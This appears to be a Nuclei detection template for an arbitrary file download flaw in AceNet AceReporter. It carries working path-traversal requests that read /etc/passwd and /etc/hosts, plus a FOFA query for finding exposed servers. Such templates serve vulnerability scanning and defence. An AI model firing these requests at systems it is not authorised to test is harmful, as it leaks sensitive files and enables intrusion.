id: acenet-acereporter-report-component-arbitrary-file-download

info:
  name: AceNet AceReporter Report component Arbitrary file download
  author: SleepingBag945
  severity: medium
  description: |
    The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory to download or read a file beyond the original specified path.
    The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.
  metadata:
    fofa-query: title="Login @ Reporter" || title="Technology, Inc."
  tags: file download

http:
  - raw:
      - |
        GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt  HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt  HTTP/1.1
        Host: {{Hostname}}



    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"root") && contains(body_1,"daemon")'
          - 'status_code_2 == 200 && contains(body_2,"127.0.0.1")'
        condition: and
